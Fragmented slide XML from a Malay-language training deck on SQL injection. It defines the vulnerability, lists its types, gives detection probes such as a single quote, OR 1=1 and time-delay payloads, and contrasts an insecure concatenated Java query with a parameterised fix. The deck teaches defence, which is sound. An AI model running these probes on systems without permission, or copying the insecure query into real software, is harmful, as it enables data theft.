              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493690" y="991674"/>
            <a:ext cx="11097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8E00C9-AE9A-4EC5-98B7-E91C537FC590}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10728101" y="6274086"/>
            <a:ext cx="1309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78812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9639-48C3-448E-88B5-D9769FA4A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388272"/>
            <a:ext cx="9144000" cy="667909"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Cara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="3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0B533-0C6E-4AAC-98E2-61AA2B7F7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1" y="1513060"/>
            <a:ext cx="9786551" cy="46227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900" b="1" u="sng" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0"/>
              <a:t> code yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0" err="1"/>
              <a:t>selamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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 query = "SELECT * FROM products WHERE category = '"+ input + “’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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Statement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statement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connection.createStatement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pPr algn="l"/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ResultSet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resultSet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statement.executeQuery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(query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> code yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>selamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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PreparedStatement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 statement =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connection.prepareStatement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("SELECT * FROM products WHERE category = ?");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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statement.setString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(1, input);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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ResultSet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resultSet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statement.executeQuery</a:t>
            </a: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  <a:endParaRPr lang="en-MY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2D4D0-A6FE-46F2-A6A4-0C1A2E6CBAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915910" y="1196516"/>
            <a:ext cx="9786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301732-EF7D-4C7A-A6AC-0B327695EC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10766856" y="6400801"/>
            <a:ext cx="1173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48367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CB6A-9062-4FF8-A933-E5A8A1DD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482" y="540913"/>
            <a:ext cx="2738907" cy="818278"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4700" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Rujukan</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="4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2044-B748-4793-B593-D84455FD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825" y="1841681"/>
            <a:ext cx="9672033" cy="38765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latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/sql-injection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latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:latin typeface="Ubuntu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latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.hackingarticles.in/beginner-guide-sql-injection-boolean-based-part-2/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:latin typeface="Ubuntu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latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/sql-injection/blind</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:latin typeface="Ubuntu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latin typeface="Ubuntu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C3A420-2032-4083-AF67-D34E397260A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081825" y="1519707"/>
            <a:ext cx="10135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5CA7C0-48C4-4163-9B13-98BD90309FE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10753859" y="6400801"/>
            <a:ext cx="1335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8304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0CD4-F008-4B80-9B97-5F1DE896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62" y="2766218"/>
            <a:ext cx="10636876" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>SESI PRAKTIKAL &amp; LIVE TUTORIAL</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="4700" b="1" dirty="0">
              <a:latin typeface="Ubunt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888A-42BE-46D9-A7D2-7CEF36C3E723}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10715221" y="6362164"/>
            <a:ext cx="1558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72529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F4D4-C8C9-4C39-A20D-A2723821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815" y="345346"/>
            <a:ext cx="9144001" cy="1050968"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4700" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4700" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> SQL injection (SQLi)?</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="4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D545A-F3D7-4C45-BF92-F11FA0181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9" y="1948017"/>
            <a:ext cx="9144000" cy="37255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Ubuntu"/>
              </a:rPr>
              <a:t>SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>adalah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sebuah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kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>laman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>membolehkan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penggodam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bermain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dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> queries yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>aplikasi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tersebut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untuk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masuk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dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> database. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Kerentanan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ini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umumnya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memungkinkan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penggodam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untuk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mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kebiasaannya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tidak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dapat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diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>pihak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luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>. Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>itu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termasuklah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kepunyaan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pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>atau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apa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sahaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>itu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sahaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>mampu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akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Dalam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banyak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kes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>penggodam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dapat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mengubah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atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> delete data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>menyebabkan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impak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buruk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kepada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aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr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sesetengah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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>penggodam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SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> compromise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sebarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> underlying server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back-end infrastructure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denial-of-service.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C6EECB-07B6-4B00-B962-BCD96E676827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295399" y="1633529"/>
            <a:ext cx="9601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13A7DB-8505-48D0-92D8-CC8D7111387B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10668000" y="6370552"/>
            <a:ext cx="1243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DFM_Rekrut</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296383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620B-8E44-4BD9-8242-F0725A1B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451" y="476517"/>
            <a:ext cx="3382851" cy="625095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Jenis-Jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="3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570FD-61AE-4CB6-9AC4-B70693C9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362" y="2540365"/>
            <a:ext cx="9607638" cy="261762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In-Band SQLi :  Error-Based &amp; Union-Based (Tutorial)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Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : Boolean-Based &amp; Time-Based (Tutorial)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Out-of-Band SQLi (Tutorial)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2F29D4-F620-449A-9CDB-DB1CA58BC195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060362" y="1545465"/>
            <a:ext cx="9848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DE76AD-18D0-46D7-80EB-938CC2AA86C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10663705" y="6387921"/>
            <a:ext cx="11676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53856-9932-4017-83DA-CA692F80A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05" y="3429000"/>
            <a:ext cx="2803300" cy="21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67F6-D28F-4AA9-8E03-536B19695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091" y="469556"/>
            <a:ext cx="7952937" cy="593768"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Cara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> SQLi vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="3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B5D8B-9533-4087-81F9-41EEF97BB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183" y="1791733"/>
            <a:ext cx="10083114" cy="42383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100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Submit single quote character ‘ dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>lihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>sebarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> error yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu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>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> SQL-specific syntax yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>mengeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> (original) value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> entry point, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> different value, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kemudian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lihat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kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> systematic difference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>sewaktu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kita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dapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> application responses.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>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Submit Boolean conditions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> OR 1=1 and OR 1=2, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>lihat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kepada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perbezaan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dalam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respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu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>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Submit payloads yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>direka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untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> trigger time delays </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>sewaktu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kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> execute, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dalam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rangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> SQL query, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>lihat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kepada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perbezaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> masa yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>diambil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untuk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respon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu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>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Submit OAST payloads yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>direka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untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> trigger out-of-band network interaction, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dalam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rangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> SQL query. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Kemudian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kita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lihat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kepada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sebarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> resulting interactions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-MY" sz="21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5B6C7F-AF61-4874-B6E3-A0647074058A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="976183" y="1371597"/>
            <a:ext cx="9910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27ABE8-1345-4C98-A7E0-4351C3287534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10775092" y="6413157"/>
            <a:ext cx="1322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467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390-70B8-40D0-B412-E20C1736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541" y="463639"/>
            <a:ext cx="5816958" cy="676611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>In Band SQLi [Union-Based]</a:t>
            </a:r>
